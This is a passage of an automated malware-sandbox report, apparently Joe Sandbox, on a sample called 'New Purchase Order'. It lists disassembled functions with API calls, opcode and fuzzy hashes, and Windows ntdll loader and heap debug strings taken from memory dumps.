                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                          • Instruction ID: 7b60794ad80a06acb647eca91f5e56653821d3cfb1d91a0d0caff21413609de5
                          • Opcode Fuzzy Hash: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                          • Instruction Fuzzy Hash: 3BE06DB22042047BD610EF59EC41EDB77ACDFC5710F00441AF908A7281DB75B9108BB8
                          Function 0042C8A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 228 42c8a3-42c8e7 call 404773 call 42d7c3 RtlAllocateHeap
                          APIs
                          • RtlAllocateHeap.NTDLL(?,0041E52E,?,?,00000000,?,0041E52E,?,?,?), ref: 0042C8E2
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                          • Instruction ID: 75f7dc53d552a5dc80399bc2a89f24ad6a6ecd643c57ce83a987320a35da5cda
                          • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                          • Instruction Fuzzy Hash: 95E06DB12042047BD610EF69EC41EAB37ACDFC5710F004419FE08A7242D770B9148AB9
                          Function 0042C943 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 243 42c943-42c97f call 404773 call 42d7c3 ExitProcess
                          APIs
                          • ExitProcess.KERNEL32(?,00000000,00000000,?,7D282D94,?,?,7D282D94), ref: 0042C97A
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: 52f014dffe07f1b75dafc72ee9e052d85fafd1d86f3f1a40ae16dcff4a33ecd6
                          • Instruction ID: 682fffa712135dc736fe9070f12072bcd6a9e54f8752c83740501f4c0056a1d0
                          • Opcode Fuzzy Hash: 52f014dffe07f1b75dafc72ee9e052d85fafd1d86f3f1a40ae16dcff4a33ecd6
                          • Instruction Fuzzy Hash: BEE046766402147BD620AB6AEC42F9B776CDFC5714F40841AFA08A7241CA74BA0587B8
                          Function 01172C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 248 1172c0a-1172c0f 249 1172c11-1172c18 248->249 250 1172c1f-1172c26 LdrInitializeThunk 248->250
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 602256cd8125a1c08e55479d784888a33d626a111dbe9dd60da4e5cb77bd214d
                          • Instruction ID: 69b80a47a956ff265647d40ed8c76c50f6b2576196c2c32d41ba07d2277e0a37
                          • Opcode Fuzzy Hash: 602256cd8125a1c08e55479d784888a33d626a111dbe9dd60da4e5cb77bd214d
                          • Instruction Fuzzy Hash: C7B09B719015C5C5DA15F7644708717791577D0701F65C061D3030655F4738C1D1E675

                          Non-executed Functions

                          Function 011B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2160512332
                          • Opcode ID: 95fef494bf873a445176d833e969a8ff272d2d578f045ffb9b56561843fe8aa8
                          • Instruction ID: beed454ef2577ef9899c85f85cc66970771ab7ead898c4c1113ead54b31d794d
                          • Opcode Fuzzy Hash: 95fef494bf873a445176d833e969a8ff272d2d578f045ffb9b56561843fe8aa8
                          • Instruction Fuzzy Hash: 9E92A071604742AFE729DF29C884FABB7E8BB88754F04492DFA94D7250D770E848CB52
                          Function 01168620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                          Download Yara Rule
                          Strings
                          • Invalid debug info address of this critical section, xrefs: 011A54B6
                          • Thread is in a state in which it cannot own a critical section, xrefs: 011A5543
                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A540A, 011A5496, 011A5519
                          • Critical section address., xrefs: 011A5502
                          • corrupted critical section, xrefs: 011A54C2
                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A54CE
                          • Critical section debug info address, xrefs: 011A541F, 011A552E
                          • Critical section address, xrefs: 011A5425, 011A54BC, 011A5534
                          • undeleted critical section in freed memory, xrefs: 011A542B
                          • Thread identifier, xrefs: 011A553A
                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A54E2
                          • double initialized or corrupted critical section, xrefs: 011A5508
                          • Address of the debug info found in the active list., xrefs: 011A54AE, 011A54FA
                          • 8, xrefs: 011A52E3
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                          • API String ID: 0-2368682639
                          • Opcode ID: 8f98c95e747f3762e7e6907f48e4a54ee4eb8777c6110ce041ee28dbd3b88c95
                          • Instruction ID: c5f611a99c7add780a3efd322ce08d074a25578b7d21897e3cc7bfa2d10f1672
                          • Opcode Fuzzy Hash: 8f98c95e747f3762e7e6907f48e4a54ee4eb8777c6110ce041ee28dbd3b88c95
                          • Instruction Fuzzy Hash: D381BDB5A44358EFDB68CF99C844BAEBBBAFB48704F548129F504B7640D371A941CB60
                          Function 011629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                          Download Yara Rule
                          Strings
                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011A2602
                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011A2409
                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011A2506
                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011A2412
                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011A2498
                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011A22E4
                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011A25EB
                          • @, xrefs: 011A259B
                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011A2624
                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011A24C0
                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 011A261F
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                          • API String ID: 0-4009184096
                          • Opcode ID: 097a43af7b9e9d302defe2bdc0624ac8c27397f41aeef26f84185a68b5b96197
                          • Instruction ID: 17ed47733738c2902891e72837741efe767e5a9a747b3bf2a9459c5f6e1d9a7f
                          • Opcode Fuzzy Hash: 097a43af7b9e9d302defe2bdc0624ac8c27397f41aeef26f84185a68b5b96197
                          • Instruction Fuzzy Hash: AD0280B5D002299FDB39DB54CC80BE9BBB8AF54304F4141EAEA09A7241E7319F94CF59
                          Function 011D8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                          • API String ID: 0-2515994595
                          • Opcode ID: 3269b84564eefde410a371ed70fa4b344b391e6b265527a75f7e0d8c9d9b4a0a
                          • Instruction ID: da3bf3997cab9f924b7f2d378c4d5efa96f00cfb3ffb3346d269263c7df90e70
                          • Opcode Fuzzy Hash: 3269b84564eefde410a371ed70fa4b344b391e6b265527a75f7e0d8c9d9b4a0a
                          • Instruction Fuzzy Hash: A851AF715047519BD32EDF188944BABBBECEF94254F144A1EE999C3284E7B0E604C7A2
                          Function 011E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                          • API String ID: 0-1700792311
                          • Opcode ID: 4036e3921e2f3643093cb84e42dc507469eba8f7c57771d6f898e5b4ada93011
                          • Instruction ID: d0c43c84e470e92b7ec3f57d998f1370da0ae544af06db2e102f84351e4e36e7
                          • Opcode Fuzzy Hash: 4036e3921e2f3643093cb84e42dc507469eba8f7c57771d6f898e5b4ada93011
                          • Instruction Fuzzy Hash: F5D1DC71A04A82EFDB2EDFA8D448AADBBF1FF49704F088049F4459B252D7B49981CF14
                          Function 011B89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                          Download Yara Rule
                          Strings
                          • VerifierDebug, xrefs: 011B8CA5
                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 011B8A67
                          • HandleTraces, xrefs: 011B8C8F
                          • AVRF: -*- final list of providers -*- , xrefs: 011B8B8F
                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 011B8A3D
                          • VerifierFlags, xrefs: 011B8C50
                          • VerifierDlls, xrefs: 011B8CBD
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                          • API String ID: 0-3223716464
                          • Opcode ID: 88907c6603154e42b9f15c9332fe3fe2d823e8eb3c54b16e91c97111fb1e89e7
                          • Instruction ID: fd1421261e275faa116049dbbbebf5427049e4f2480b8ad5ce476bc397e8bdae
                          • Opcode Fuzzy Hash: 88907c6603154e42b9f15c9332fe3fe2d823e8eb3c54b16e91c97111fb1e89e7
                          • Instruction Fuzzy Hash: 439133B2A45326BFD72EEF2898C0BEE77A8AB54F18F454559FA406B280C730DC01C795
                          Function 0113EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                          • API String ID: 0-1109411897
                          • Opcode ID: adcf7000d8f4da21e6a5424e459e747e314cc8f29216dcd4e275afc0a1086ddd
                          • Instruction ID: 71c0f66ca94aabbbbc4877c4db518339a95cf4757636f75f4969735932ea0152
                          • Opcode Fuzzy Hash: adcf7000d8f4da21e6a5424e459e747e314cc8f29216dcd4e275afc0a1086ddd
                          • Instruction Fuzzy Hash: C0A24774E0562A8BDF68CF18C9887ADBBB5AF85304F1442E9D91DA7254DB309E86CF01
                          Function 011663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-792281065
                          • Opcode ID: 08ab488f4369e345f7b17dd0dd586db43cb97c9ab3d646870425ab1c4205b916
                          • Instruction ID: 310863f024868b38ee874d56efc4124acae1708c0fc63d0be81aebc554500f8f
                          • Opcode Fuzzy Hash: 08ab488f4369e345f7b17dd0dd586db43cb97c9ab3d646870425ab1c4205b916
                          • Instruction Fuzzy Hash: 19914731B00315ABEB3DDF18E848BAE7FA5FF50B28F584129E9006BA85D7B59801C791
                          Function 0112645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                          Download Yara Rule
                          Strings
                          • apphelp.dll, xrefs: 01126496
                          • minkernel\ntdll\ldrinit.c, xrefs: 01189A11, 01189A3A
                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011899ED
                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01189A01
                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01189A2A
                          • LdrpInitShimEngine, xrefs: 011899F4, 01189A07, 01189A30
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-204845295
                          • Opcode ID: 11739eec06dcf15c616a6ce8417b59bee39fbf66287679ba803ed66e9ed4ad62
                          • Instruction ID: e7d85ec0dc7f7d3380b5c9b2dd266e150047463a3fa05a0f0746d6e7a2f425ed
                          • Opcode Fuzzy Hash: 11739eec06dcf15c616a6ce8417b59bee39fbf66287679ba803ed66e9ed4ad62
                          • Instruction Fuzzy Hash: 2E51D371208314AFE72DEF24D885BABB7E4FB84648F10491DF98597194E730E904CB92
                          Function 01162674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                          Download Yara Rule
                          Strings
                          • RtlGetAssemblyStorageRoot, xrefs: 011A2160, 011A219A, 011A21BA
                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011A2178
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011A21BF
                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011A2180
                          • SXS: %s() passed the empty activation context, xrefs: 011A2165
                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011A219F
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                          • API String ID: 0-861424205
                          • Opcode ID: 1ae7934e6f00f78e96fa12094a7b78dcf37f0b583b19a611264b2b459e60f4f5
                          • Instruction ID: b30aa4400e7a85fa5368b343c61b510e884175cf151891543b8bfec4b19219a7
                          • Opcode Fuzzy Hash: 1ae7934e6f00f78e96fa12094a7b78dcf37f0b583b19a611264b2b459e60f4f5
                          • Instruction Fuzzy Hash: 1331E93AF4021577E72D8A998C81F5ABE6CDB65A94F054069FA0467284E370AA01C7A1
                          Function 0116C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                          Download Yara Rule
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 0116C6C3
                          • Loading import redirection DLL: '%wZ', xrefs: 011A8170
                          • minkernel\ntdll\ldrredirect.c, xrefs: 011A8181, 011A81F5
                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 011A81E5
                          • LdrpInitializeProcess, xrefs: 0116C6C4
                          • LdrpInitializeImportRedirection, xrefs: 011A8177, 011A81EB
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                          • API String ID: 0-475462383
                          • Opcode ID: a408e581aafca9a25d14a52cfd6d6fb196f579dcfee5f19f6106c234f6ba118d
                          • Instruction ID: a443850a5e60294b3bc00bc4a2742a5acb911258fe026b0b7d2750c271f0499b
                          • Opcode Fuzzy Hash: a408e581aafca9a25d14a52cfd6d6fb196f579dcfee5f19f6106c234f6ba118d
                          • Instruction Fuzzy Hash: FD31E472644346AFD32CEF28D945E2ABBA4BF94B24F040558F9856B395E720EC04C7A2
                          Function 0117096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 01172DF0: LdrInitializeThunk.NTDLL ref: 01172DFA
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170BA3
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170BB6
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170D60
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170D74
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                          • String ID:
                          • API String ID: 1404860816-0
                          • Opcode ID: 88f470a21c0c3f1a73074fdba65d4fcad792826bba499eed42902064766334f4
                          • Instruction ID: 5bbc92a196f0a04557fe03ebbd3a866c6a9303af66ec10db269181e3101e1f0d
                          • Opcode Fuzzy Hash: 88f470a21c0c3f1a73074fdba65d4fcad792826bba499eed42902064766334f4
                          • Instruction Fuzzy Hash: BC426C75900715DFDB29CF28C840BAABBF5FF09314F1445AAE9899B341E770AA84CF61
                          Function 0113A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                          • API String ID: 0-379654539
                          • Opcode ID: d6ec26467a0dcdac7442154c17a977f7d5835b15b67179d7c645f486eccda12e
                          • Instruction ID: d526508362fff4dd3664915997531bffd71c310cfefbdc40134234cb90178021
                          • Opcode Fuzzy Hash: d6ec26467a0dcdac7442154c17a977f7d5835b15b67179d7c645f486eccda12e
                          • Instruction Fuzzy Hash: 6CC17774108382DFDB19CF58D044B6ABBE4BF84708F04896AF9D5CB299E734DA49CB52
                          Function 01168402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                          Download Yara Rule
                          Strings
                          • @, xrefs: 01168591
                          • minkernel\ntdll\ldrinit.c, xrefs: 01168421
                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0116855E
                          • LdrpInitializeProcess, xrefs: 01168422
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1918872054
                          • Opcode ID: 1cde4e108b3bef4e199219559709ac508a27f0e15fd70fa21fa6515fb9d9ad3d
                          • Instruction ID: b59530b26d1182361e9acd71bcc631e43eeaa3496d8879bdb5434f0313532114
                          • Opcode Fuzzy Hash: 1cde4e108b3bef4e199219559709ac508a27f0e15fd70fa21fa6515fb9d9ad3d
                          • Instruction Fuzzy Hash: 77918B71508345AFD72ADE25C840FABBAECFB84758F40092EFA8492151E735D915CB62
                          Function 0116273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                          Download Yara Rule
                          Strings
                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011A21D9, 011A22B1
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011A22B6
                          • .Local, xrefs: 011628D8
                          • SXS: %s() passed the empty activation context, xrefs: 011A21DE
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                          • API String ID: 0-1239276146
                          • Opcode ID: 618a444659a2036614b6644d70f928061b1aacf2f2c95f7df42d00649012d84c
                          • Instruction ID: 922bef7a16f8851203dc7ad93c34bd2338a500fd1fe72a583df68e1764841d57
                          • Opcode Fuzzy Hash: 618a444659a2036614b6644d70f928061b1aacf2f2c95f7df42d00649012d84c
                          • Instruction Fuzzy Hash: 06A1D03590022ADBDB2CCF68CC84BA9B7B9BF58354F1541EAD908A7351E7319E90CF81
                          Function 011364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                          Download Yara Rule
                          Strings
                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01191028
                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011910AE
                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01190FE5
                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0119106B
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                          • API String ID: 0-1468400865
                          • Opcode ID: 1ea2ceaf8283212062488125d29bf4743a9c2fd93451bd13cadb4e19cb702fc1
                          • Instruction ID: 57831ea33ad64edd2e2bb73d1bbcc5022976fe37a51ce5724e2943af40a4bcaa
                          • Opcode Fuzzy Hash: 1ea2ceaf8283212062488125d29bf4743a9c2fd93451bd13cadb4e19cb702fc1
                          • Instruction Fuzzy Hash: 6071C371904305AFCB29DF18C884B977FA8EF957A4F404468F9488B28AD735D689CFD2
                          Function 0115245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                          Download Yara Rule
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 0119A9A2
                          • apphelp.dll, xrefs: 01152462
                          • LdrpDynamicShimModule, xrefs: 0119A998
                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0119A992
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-176724104
                          • Opcode ID: f87b4ab346d24be1a7d32e35eabbbfde0536720be811573b5503addce4ee4354
                          • Instruction ID: 847255f6434a20df5425760c4ab786b5471d6352ac32a417ea7d65e7428ec81f
                          • Opcode Fuzzy Hash: f87b4ab346d24be1a7d32e35eabbbfde0536720be811573b5503addce4ee4354
                          • Instruction Fuzzy Hash: 52312672A00201FBDF3DDF5DB889AAEBBB5FF84B14F260019E920A7245D7B45985C781
                          Function 011429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                          Download Yara Rule
                          Strings
